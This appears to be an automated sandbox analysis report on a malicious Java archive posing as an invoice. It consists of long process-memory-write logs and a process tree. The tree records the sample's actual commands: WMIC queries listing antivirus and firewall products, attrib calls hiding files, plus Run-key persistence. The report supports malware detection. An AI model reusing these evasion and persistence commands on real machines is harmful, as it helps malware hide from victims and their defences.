PID 1780 wrote to memory of 1340 | 1780 | cmd.exe | 176
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 177
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 177
PID 1088 wrote to memory of 1912 | 1088 | java.exe | 177
PID 1912 wrote to memory of 1940 | 1912 | cmd.exe | 178
PID 1912 wrote to memory of 1940 | 1912 | cmd.exe | 178
PID 1912 wrote to memory of 1940 | 1912 | cmd.exe | 178
PID 1912 wrote to memory of 2004 | 1912 | cmd.exe | 179
PID 1912 wrote to memory of 2004 | 1912 | cmd.exe | 179
PID 1912 wrote to memory of 2004 | 1912 | cmd.exe | 179
PID 1088 wrote to memory of 1916 | 1088 | java.exe | 180
PID 1088 wrote to memory of 1916 | 1088 | java.exe | 180
PID 1088 wrote to memory of 1916 | 1088 | java.exe | 180
PID 1916 wrote to memory of 1772 | 1916 | cmd.exe | 181
PID 1916 wrote to memory of 1772 | 1916 | cmd.exe | 181
PID 1916 wrote to memory of 1772 | 1916 | cmd.exe | 181
PID 1916 wrote to memory of 1932 | 1916 | cmd.exe | 182
PID 1916 wrote to memory of 1932 | 1916 | cmd.exe | 182
PID 1916 wrote to memory of 1932 | 1916 | cmd.exe | 182
PID 1088 wrote to memory of 1388 | 1088 | java.exe | 183
PID 1088 wrote to memory of 1388 | 1088 | java.exe | 183
PID 1088 wrote to memory of 1388 | 1088 | java.exe | 183
PID 1088 wrote to memory of 464 | 1088 | java.exe | 184
PID 1088 wrote to memory of 464 | 1088 | java.exe | 184
PID 1088 wrote to memory of 464 | 1088 | java.exe | 184
PID 1388 wrote to memory of 1332 | 1388 | cmd.exe | 185
PID 1388 wrote to memory of 1332 | 1388 | cmd.exe | 185
PID 1388 wrote to memory of 1332 | 1388 | cmd.exe | 185
PID 1388 wrote to memory of 1632 | 1388 | cmd.exe | 186
PID 1388 wrote to memory of 1632 | 1388 | cmd.exe | 186
PID 1388 wrote to memory of 1632 | 1388 | cmd.exe | 186
PID 1088 wrote to memory of 540 | 1088 | java.exe | 188
PID 1088 wrote to memory of 540 | 1088 | java.exe | 188
PID 1088 wrote to memory of 540 | 1088 | java.exe | 188
PID 540 wrote to memory of 1396 | 540 | cmd.exe | 189
PID 540 wrote to memory of 1396 | 540 | cmd.exe | 189
PID 540 wrote to memory of 1396 | 540 | cmd.exe | 189
PID 540 wrote to memory of 1456 | 540 | cmd.exe | 190
PID 540 wrote to memory of 1456 | 540 | cmd.exe | 190
PID 540 wrote to memory of 1456 | 540 | cmd.exe | 190
PID 1088 wrote to memory of 1816 | 1088 | java.exe | 191
PID 1088 wrote to memory of 1816 | 1088 | java.exe | 191
PID 1088 wrote to memory of 1816 | 1088 | java.exe | 191
PID 1816 wrote to memory of 1868 | 1816 | cmd.exe | 192
PID 1816 wrote to memory of 1868 | 1816 | cmd.exe | 192
PID 1816 wrote to memory of 1868 | 1816 | cmd.exe | 192
PID 1816 wrote to memory of 1936 | 1816 | cmd.exe | 193
PID 1816 wrote to memory of 1936 | 1816 | cmd.exe | 193
PID 1816 wrote to memory of 1936 | 1816 | cmd.exe | 193
PID 1088 wrote to memory of 1552 | 1088 | java.exe | 194
PID 1088 wrote to memory of 1552 | 1088 | java.exe | 194
PID 1088 wrote to memory of 1552 | 1088 | java.exe | 194
PID 1552 wrote to memory of 1620 | 1552 | cmd.exe | 195
PID 1552 wrote to memory of 1620 | 1552 | cmd.exe | 195
PID 1552 wrote to memory of 1620 | 1552 | cmd.exe | 195
PID 1552 wrote to memory of 1608 | 1552 | cmd.exe | 196
PID 1552 wrote to memory of 1608 | 1552 | cmd.exe | 196
PID 1552 wrote to memory of 1608 | 1552 | cmd.exe | 196
PID 1088 wrote to memory of 1344 | 1088 | java.exe | 197
PID 1088 wrote to memory of 1344 | 1088 | java.exe | 197
PID 1088 wrote to memory of 1344 | 1088 | java.exe | 197
PID 1344 wrote to memory of 1692 | 1344 | cmd.exe | 198
PID 1344 wrote to memory of 1692 | 1344 | cmd.exe | 198
PID 1344 wrote to memory of 1692 | 1344 | cmd.exe | 198
PID 1344 wrote to memory of 1836 | 1344 | cmd.exe | 199
PID 1344 wrote to memory of 1836 | 1344 | cmd.exe | 199
PID 1344 wrote to memory of 1836 | 1344 | cmd.exe | 199
PID 1088 wrote to memory of 1820 | 1088 | java.exe | 200
PID 1088 wrote to memory of 1820 | 1088 | java.exe | 200
PID 1088 wrote to memory of 1820 | 1088 | java.exe | 200
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 201
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 201
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 201
PID 1820 wrote to memory of 2004 | 1820 | cmd.exe | 202
PID 1820 wrote to memory of 2004 | 1820 | cmd.exe | 202
PID 1820 wrote to memory of 2004 | 1820 | cmd.exe | 202
PID 1820 wrote to memory of 844 | 1820 | cmd.exe | 204
PID 1820 wrote to memory of 844 | 1820 | cmd.exe | 204
PID 1820 wrote to memory of 844 | 1820 | cmd.exe | 204
PID 1088 wrote to memory of 1908 | 1088 | java.exe | 205
PID 1088 wrote to memory of 1908 | 1088 | java.exe | 205
PID 1088 wrote to memory of 1908 | 1088 | java.exe | 205
PID 1908 wrote to memory of 2032 | 1908 | cmd.exe | 206
PID 1908 wrote to memory of 2032 | 1908 | cmd.exe | 206
PID 1908 wrote to memory of 2032 | 1908 | cmd.exe | 206
PID 1908 wrote to memory of 2012 | 1908 | cmd.exe | 207
PID 1908 wrote to memory of 2012 | 1908 | cmd.exe | 207
PID 1908 wrote to memory of 2012 | 1908 | cmd.exe | 207
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 208
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 208
PID 1088 wrote to memory of 1796 | 1088 | java.exe | 208
PID 1796 wrote to memory of 1840 | 1796 | cmd.exe | 209
PID 1796 wrote to memory of 1840 | 1796 | cmd.exe | 209
PID 1796 wrote to memory of 1840 | 1796 | cmd.exe | 209
PID 1796 wrote to memory of 464 | 1796 | cmd.exe | 210
PID 1796 wrote to memory of 464 | 1796 | cmd.exe | 210
PID 1796 wrote to memory of 464 | 1796 | cmd.exe | 210
PID 1088 wrote to memory of 520 | 1088 | java.exe | 211
PID 1088 wrote to memory of 520 | 1088 | java.exe | 211
PID 1088 wrote to memory of 520 | 1088 | java.exe | 211
PID 520 wrote to memory of 1340 | 520 | cmd.exe | 212
PID 520 wrote to memory of 1340 | 520 | cmd.exe | 212
PID 520 wrote to memory of 1340 | 520 | cmd.exe | 212
PID 520 wrote to memory of 1692 | 520 | cmd.exe | 213
PID 520 wrote to memory of 1692 | 520 | cmd.exe | 213
PID 520 wrote to memory of 1692 | 520 | cmd.exe | 213
PID 1088 wrote to memory of 320 | 1088 | java.exe | 214
PID 1088 wrote to memory of 320 | 1088 | java.exe | 214
PID 1088 wrote to memory of 320 | 1088 | java.exe | 214
PID 320 wrote to memory of 2004 | 320 | cmd.exe | 215
PID 320 wrote to memory of 2004 | 320 | cmd.exe | 215
PID 320 wrote to memory of 2004 | 320 | cmd.exe | 215
PID 320 wrote to memory of 1972 | 320 | cmd.exe | 216
PID 320 wrote to memory of 1972 | 320 | cmd.exe | 216
PID 320 wrote to memory of 1972 | 320 | cmd.exe | 216
PID 1088 wrote to memory of 1396 | 1088 | java.exe | 217
PID 1088 wrote to memory of 1396 | 1088 | java.exe | 217
PID 1088 wrote to memory of 1396 | 1088 | java.exe | 217
PID 1396 wrote to memory of 2032 | 1396 | cmd.exe | 218
PID 1396 wrote to memory of 2032 | 1396 | cmd.exe | 218
PID 1396 wrote to memory of 2032 | 1396 | cmd.exe | 218
PID 1396 wrote to memory of 1508 | 1396 | cmd.exe | 219
PID 1396 wrote to memory of 1508 | 1396 | cmd.exe | 219
PID 1396 wrote to memory of 1508 | 1396 | cmd.exe | 219
PID 1088 wrote to memory of 744 | 1088 | java.exe | 220
PID 1088 wrote to memory of 744 | 1088 | java.exe | 220
PID 1088 wrote to memory of 744 | 1088 | java.exe | 220
PID 744 wrote to memory of 1772 | 744 | cmd.exe | 221
PID 744 wrote to memory of 1772 | 744 | cmd.exe | 221
PID 744 wrote to memory of 1772 | 744 | cmd.exe | 221
PID 744 wrote to memory of 1332 | 744 | cmd.exe | 222
PID 744 wrote to memory of 1332 | 744 | cmd.exe | 222
PID 744 wrote to memory of 1332 | 744 | cmd.exe | 222
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 223
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 223
PID 1088 wrote to memory of 1580 | 1088 | java.exe | 223
PID 1088 wrote to memory of 1948 | 1088 | java.exe | 225
PID 1088 wrote to memory of 1948 | 1088 | java.exe | 225
PID 1088 wrote to memory of 1948 | 1088 | java.exe | 225
PID 1948 wrote to memory of 1620 | 1948 | cmd.exe | 226
PID 1948 wrote to memory of 1620 | 1948 | cmd.exe | 226
PID 1948 wrote to memory of 1620 | 1948 | cmd.exe | 226
PID 1948 wrote to memory of 1592 | 1948 | cmd.exe | 227
PID 1948 wrote to memory of 1592 | 1948 | cmd.exe | 227
PID 1948 wrote to memory of 1592 | 1948 | cmd.exe | 227
PID 1088 wrote to memory of 1836 | 1088 | java.exe | 228
PID 1088 wrote to memory of 1836 | 1088 | java.exe | 228
PID 1088 wrote to memory of 1836 | 1088 | java.exe | 228
PID 1836 wrote to memory of 1976 | 1836 | cmd.exe | 229
PID 1836 wrote to memory of 1976 | 1836 | cmd.exe | 229
PID 1836 wrote to memory of 1976 | 1836 | cmd.exe | 229
PID 1836 wrote to memory of 1472 | 1836 | cmd.exe | 230
PID 1836 wrote to memory of 1472 | 1836 | cmd.exe | 230
PID 1836 wrote to memory of 1472 | 1836 | cmd.exe | 230
PID 1088 wrote to memory of 1204 | 1088 | java.exe | 231
PID 1088 wrote to memory of 1204 | 1088 | java.exe | 231
PID 1088 wrote to memory of 1204 | 1088 | java.exe | 231
PID 1204 wrote to memory of 2012 | 1204 | cmd.exe | 232
PID 1204 wrote to memory of 2012 | 1204 | cmd.exe | 232
PID 1204 wrote to memory of 2012 | 1204 | cmd.exe | 232
PID 1204 wrote to memory of 1012 | 1204 | cmd.exe | 233
PID 1204 wrote to memory of 1012 | 1204 | cmd.exe | 233
PID 1204 wrote to memory of 1012 | 1204 | cmd.exe | 233
PID 1088 wrote to memory of 1736 | 1088 | java.exe | 234
PID 1088 wrote to memory of 1736 | 1088 | java.exe | 234
PID 1088 wrote to memory of 1736 | 1088 | java.exe | 234
PID 1736 wrote to memory of 1664 | 1736 | cmd.exe | 235
PID 1736 wrote to memory of 1664 | 1736 | cmd.exe | 235
PID 1736 wrote to memory of 1664 | 1736 | cmd.exe | 235
PID 1736 wrote to memory of 784 | 1736 | cmd.exe | 236
PID 1736 wrote to memory of 784 | 1736 | cmd.exe | 236
PID 1736 wrote to memory of 784 | 1736 | cmd.exe | 236
PID 1088 wrote to memory of 1072 | 1088 | java.exe | 237
PID 1088 wrote to memory of 1072 | 1088 | java.exe | 237
PID 1088 wrote to memory of 1072 | 1088 | java.exe | 237
PID 1072 wrote to memory of 1956 | 1072 | cmd.exe | 238
PID 1072 wrote to memory of 1956 | 1072 | cmd.exe | 238
PID 1072 wrote to memory of 1956 | 1072 | cmd.exe | 238
PID 1072 wrote to memory of 1540 | 1072 | cmd.exe | 239
PID 1072 wrote to memory of 1540 | 1072 | cmd.exe | 239
PID 1072 wrote to memory of 1540 | 1072 | cmd.exe | 239
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 240
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 240
PID 1088 wrote to memory of 2016 | 1088 | java.exe | 240
PID 2016 wrote to memory of 1940 | 2016 | cmd.exe | 241
PID 2016 wrote to memory of 1940 | 2016 | cmd.exe | 241
PID 2016 wrote to memory of 1940 | 2016 | cmd.exe | 241
PID 2016 wrote to memory of 1840 | 2016 | cmd.exe | 242
PID 2016 wrote to memory of 1840 | 2016 | cmd.exe | 242
PID 2016 wrote to memory of 1840 | 2016 | cmd.exe | 242
PID 1088 wrote to memory of 1608 | 1088 | java.exe | 243
PID 1088 wrote to memory of 1608 | 1088 | java.exe | 243
PID 1088 wrote to memory of 1608 | 1088 | java.exe | 243
PID 1608 wrote to memory of 1604 | 1608 | cmd.exe | 244
PID 1608 wrote to memory of 1604 | 1608 | cmd.exe | 244
PID 1608 wrote to memory of 1604 | 1608 | cmd.exe | 244
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 245
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 245
PID 1088 wrote to memory of 1060 | 1088 | java.exe | 245
PID 1608 wrote to memory of 1960 | 1608 | cmd.exe | 246
PID 1608 wrote to memory of 1960 | 1608 | cmd.exe | 246
PID 1608 wrote to memory of 1960 | 1608 | cmd.exe | 246
PID 1088 wrote to memory of 1936 | 1088 | java.exe | 248
PID 1088 wrote to memory of 1936 | 1088 | java.exe | 248
PID 1088 wrote to memory of 1936 | 1088 | java.exe | 248
PID 1936 wrote to memory of 1472 | 1936 | cmd.exe | 249
PID 1936 wrote to memory of 1472 | 1936 | cmd.exe | 249
PID 1936 wrote to memory of 1472 | 1936 | cmd.exe | 249
PID 1936 wrote to memory of 2012 | 1936 | cmd.exe | 250
PID 1936 wrote to memory of 2012 | 1936 | cmd.exe | 250
PID 1936 wrote to memory of 2012 | 1936 | cmd.exe | 250
PID 1088 wrote to memory of 1808 | 1088 | java.exe | 251
PID 1088 wrote to memory of 1808 | 1088 | java.exe | 251
PID 1088 wrote to memory of 1808 | 1088 | java.exe | 251
PID 1808 wrote to memory of 1664 | 1808 | cmd.exe | 252
PID 1808 wrote to memory of 1664 | 1808 | cmd.exe | 252
PID 1808 wrote to memory of 1664 | 1808 | cmd.exe | 252
PID 1808 wrote to memory of 2032 | 1808 | cmd.exe | 253
PID 1808 wrote to memory of 2032 | 1808 | cmd.exe | 253
PID 1808 wrote to memory of 2032 | 1808 | cmd.exe | 253
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 254
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 254
PID 1088 wrote to memory of 1852 | 1088 | java.exe | 254
PID 1852 wrote to memory of 1540 | 1852 | cmd.exe | 255
PID 1852 wrote to memory of 1540 | 1852 | cmd.exe | 255
PID 1852 wrote to memory of 1540 | 1852 | cmd.exe | 255
PID 1852 wrote to memory of 1332 | 1852 | cmd.exe | 256
PID 1852 wrote to memory of 1332 | 1852 | cmd.exe | 256
PID 1852 wrote to memory of 1332 | 1852 | cmd.exe | 256
PID 1088 wrote to memory of 464 | 1088 | java.exe | 257
PID 1088 wrote to memory of 464 | 1088 | java.exe | 257
PID 1088 wrote to memory of 464 | 1088 | java.exe | 257
PID 464 wrote to memory of 1924 | 464 | cmd.exe | 258
PID 464 wrote to memory of 1924 | 464 | cmd.exe | 258
PID 464 wrote to memory of 1924 | 464 | cmd.exe | 258
PID 464 wrote to memory of 1500 | 464 | cmd.exe | 259
PID 464 wrote to memory of 1500 | 464 | cmd.exe | 259
PID 464 wrote to memory of 1500 | 464 | cmd.exe | 259
PID 1088 wrote to memory of 1692 | 1088 | java.exe | 260
PID 1088 wrote to memory of 1692 | 1088 | java.exe | 260
PID 1088 wrote to memory of 1692 | 1088 | java.exe | 260
PID 1692 wrote to memory of 456 | 1692 | cmd.exe | 261
PID 1692 wrote to memory of 456 | 1692 | cmd.exe | 261
PID 1692 wrote to memory of 456 | 1692 | cmd.exe | 261
PID 1692 wrote to memory of 792 | 1692 | cmd.exe | 262
PID 1692 wrote to memory of 792 | 1692 | cmd.exe | 262
PID 1692 wrote to memory of 792 | 1692 | cmd.exe | 262
PID 1088 wrote to memory of 1868 | 1088 | java.exe | 263
PID 1088 wrote to memory of 1868 | 1088 | java.exe | 263
PID 1088 wrote to memory of 1868 | 1088 | java.exe | 263
PID 1868 wrote to memory of 1632 | 1868 | cmd.exe | 264
PID 1868 wrote to memory of 1632 | 1868 | cmd.exe | 264
PID 1868 wrote to memory of 1632 | 1868 | cmd.exe | 264
PID 1868 wrote to memory of 1060 | 1868 | cmd.exe | 265
PID 1868 wrote to memory of 1060 | 1868 | cmd.exe | 265
PID 1868 wrote to memory of 1060 | 1868 | cmd.exe | 265
PID 1088 wrote to memory of 2012 | 1088 | java.exe | 266
PID 1088 wrote to memory of 2012 | 1088 | java.exe | 266
PID 1088 wrote to memory of 2012 | 1088 | java.exe | 266
PID 2012 wrote to memory of 1516 | 2012 | cmd.exe | 267
PID 2012 wrote to memory of 1516 | 2012 | cmd.exe | 267
PID 2012 wrote to memory of 1516 | 2012 | cmd.exe | 267
PID 1088 wrote to memory of 1532 | 1088 | java.exe | 268
PID 1088 wrote to memory of 1532 | 1088 | java.exe | 268
PID 1088 wrote to memory of 1532 | 1088 | java.exe | 268
PID 1088 wrote to memory
of 1532 1088 java.exe 268 PID 1088 wrote to memory of 1532 1088 java.exe 268 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1620 792 cmd.exe 282 PID 792 wrote to memory of 1620 792 cmd.exe 282 PID 792 wrote to memory of 1620 792 cmd.exe 
282 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1924 wrote to memory of 2004 
1924 cmd.exe 296 PID 1924 wrote to memory of 2004 1924 cmd.exe 296 PID 1924 wrote to memory of 2004 1924 cmd.exe 296 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1060 wrote to memory of 1604 1060 cmd.exe 310 PID 1060 wrote to 
memory of 1604 1060 cmd.exe 310 PID 1060 wrote to memory of 1604 1060 cmd.exe 310 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2092 2068 cmd.exe 323 PID 2068 wrote to memory of 2092 2068 cmd.exe 323 PID 
2068 wrote to memory of 2092 2068 cmd.exe 323 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2472 1088 java.exe 342 PID 1088 wrote to memory of 2472 1088 java.exe 342 PID 1088 wrote to memory of 
2472 1088 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
1780 attrib.exe
1788 attrib.exe
1832 attrib.exe
1828 attrib.exe
1180 attrib.exe
1840 attrib.exe
1776 attrib.exe
1752 attrib.exe
Processes
-
(bracketed number = depth in the process tree; child processes are indented under their parent)

[1] C:\Windows\system32\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Invoice 645505.jar"
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1088

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:304

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      - Suspicious use of WriteProcessMemory
      PID:792

    [3] C:\Windows\System32\Wbem\WMIC.exe
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
        PID:744

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      - Suspicious use of WriteProcessMemory
      PID:1040

    [3] C:\Windows\System32\Wbem\WMIC.exe
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
        PID:284

  [2] C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\Oracle
      - Views/modifies file attributes
      PID:1780

  [2] C:\Windows\system32\attrib.exe
      attrib +h +r +s C:\Users\Admin\.ntusernt.ini
      - Views/modifies file attributes
      PID:1788

  [2] C:\Windows\system32\attrib.exe
      attrib -s -r C:\Users\Admin\plstY\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
      PID:1832

  [2] C:\Windows\system32\attrib.exe
      attrib +s +r C:\Users\Admin\plstY\Desktop.ini
